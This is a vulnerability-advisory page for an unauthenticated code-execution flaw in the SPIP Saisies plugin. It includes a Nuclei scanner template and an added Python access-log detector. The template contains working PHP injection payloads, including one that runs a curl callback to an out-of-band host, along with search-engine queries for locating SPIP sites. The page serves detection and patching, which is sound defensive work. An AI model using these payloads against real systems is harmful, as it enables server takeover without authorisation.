
SPIP Saisies - Remote Code Execution

πŸ—“οΈΒ 05 Jul 2026Β 03:01:21Reported byΒ ProjectDiscoveryTypeΒ 
nuclei
Β nuclei
πŸ”—Β github.comπŸ‘Β 6Β Views

Unauthenticated remote code execution in the SPIP Saisies plugin, versions 5.4.0 through 5.11.0. Update to 5.11.1.

Related

| Reporter | Title | Published | Views | Family |
|---|---|---|---|---|
| ATTACKERKB | CVE-2025-71243 | 19 Feb 2026 14:58 | – | attackerkb |
| GithubExploit | Exploit for CVE-2025-71243 | 19 Feb 2026 16:13 | – | githubexploit |
| Circl | CVE-2025-71243 | 19 Feb 2026 16:31 | – | circl |
| CNNVD | SPIP code injection vulnerability | 19 Feb 2026 00:00 | – | cnnvd |
| CVE | CVE-2025-71243 | 19 Feb 2026 14:58 | – | cve |
| Cvelist | CVE-2025-71243 SPIP Saisies Plugin < 5.11.1 Remote Code Execution | 19 Feb 2026 14:58 | – | cvelist |
| Metasploit | SPIP Saisies Plugin Unauthenticated RCE | 9 Mar 2026 18:57 | – | metasploit |
| NVD | CVE-2025-71243 | 19 Feb 2026 16:27 | – | nvd |
| Packet Storm | SPIP Saisies 5.11.0 Remote Code Execution | 24 Feb 2026 00:00 | – | packetstorm |

id: CVE-2025-71243

info:
  name: SPIP Saisies - Remote Code Execution
  author: omarkurt
  severity: critical
  description: |
    SPIP Saisies plugin 5.4.0 through 5.11.0 contains a remote code execution caused by an unspecified flaw, letting attackers execute arbitrary code on the server, exploit requires no special conditions.
  remediation: |
    Update to version 5.11.1 or later.
  impact:
    Attackers can execute arbitrary code on the server, potentially leading to full system compromise.
  reference:
    - https://vulnerability.circl.lu/vuln/cve-2025-71243
    - https://chocapikk.com/posts/2026/spip-saisies-rce/
    - https://github.com/Chocapikk/CVE-2025-71243
    - https://vulnerabletarget.com/VT-2025-71243
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-71243
    epss-score: 0.05126
    epss-percentile: 0.9137
    cwe-id: CWE-94
  metadata:
    verified: true
    max-request: 3
    vendor: spip
    product: saisies
    shodan-query: 'http.html:"SPIP"'
    fofa-query: 'app="SPIP"'
  tags: cve,cve2025,spip,rce,oast,vkev

variables:
  rce_payload: "x'/><?php echo md5('{{randstr}}'); ?><input value='x"
  oob_payload: "x'/><?php gethostbyname('{{interactsh-url}}'); ?><input value='x"
  oob_curl: "x'/><?php system('curl+-s+{{interactsh-url}}'); ?><input value='x"

flow: http(1) && (http(2) || http(3) || http(4))

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(header, "Composed-By: SPIP")'
          - 'contains(header, "X-Spip-Cache:")'
        condition: or
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/spip.php?page=contact&_anciennes_valeurs={{url_encode(rce_payload)}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{{md5(randstr)}}")'
          - 'status_code == 200'
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/spip.php?page=contact&_anciennes_valeurs={{url_encode(oob_payload)}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'status_code == 200'
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/spip.php?page=contact&_anciennes_valeurs={{url_encode(oob_curl)}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "http") || contains(interactsh_protocol, "dns")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100ceacaa1afed50aa38654b94b926d630cbcb002e66fa1ee6e4ed629fec80f6f36022100eed5f9d0a85515e2dcb9eae3084cb351dfc52bb137aa9fabe464d0104bfafb3b:922c64590222798bb761d5b6d8e72950
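
On the defensive side, the requests this template sends leave a recognizable trace in web server access logs: a `_anciennes_valeurs` query parameter whose decoded value contains a PHP open tag. The following log scanner is an added example, not part of the template or of ProjectDiscovery's code; it assumes combined-format access logs, and the function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

PARAM = "_anciennes_valeurs"  # query parameter used by the template's requests
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# PHP open tags: "<?php", "<?=" and the short "<? " form (not "<?xml").
PHP_TAG_RE = re.compile(r"<\?(?:php|=|\s|$)", re.IGNORECASE)

# Constructed sample lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Feb/2026:10:00:01 +0000] "GET /spip.php?page=contact HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [19/Feb/2026:10:00:05 +0000] "GET /spip.php?page=contact&_anciennes_valeurs=abc123 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [19/Feb/2026:10:02:13 +0000] "GET /spip.php?page=contact&_anciennes_valeurs=x%27%2F%3E%3C%3Fphp+echo+md5%28%27probe%27%29%3B+%3F%3E%3Cinput+value%3D%27x HTTP/1.1" 200 5190 "-" "scanner"',
    '198.51.100.7 - - [19/Feb/2026:10:02:14 +0000] "GET /spip.php?page=contact&_anciennes_valeurs=%253C%253Fphp%2520echo%25201%253B HTTP/1.1" 200 5120 "-" "scanner"',
]


def fully_decode(value, max_rounds=3):
    """Undo nested URL-encoding so double-encoded tags are still seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_value(target):
    """Return the decoded parameter value if it carries a PHP tag, else None."""
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name == PARAM:
            value = fully_decode(value)
            if PHP_TAG_RE.search(value):
                return value
    return None


def scan(lines):
    """Yield (line_number, decoded_value) for each log line that matches."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            value = suspicious_value(match.group("target"))
            if value is not None:
                yield number, value

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: PHP tag in {PARAM}: {value!r}")
```

A hit only shows that a request of this shape was received; whether code ran depends on the installed Saisies version, so pair the log review with a version check against 5.11.1.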

Scores as of 22 Feb 2026 18:28 (current):
Vulners AI Score: 6.9 (Medium risk)
CVSS 4: 9.3
CVSS 3.1: 9.8
EPSS: 0.05126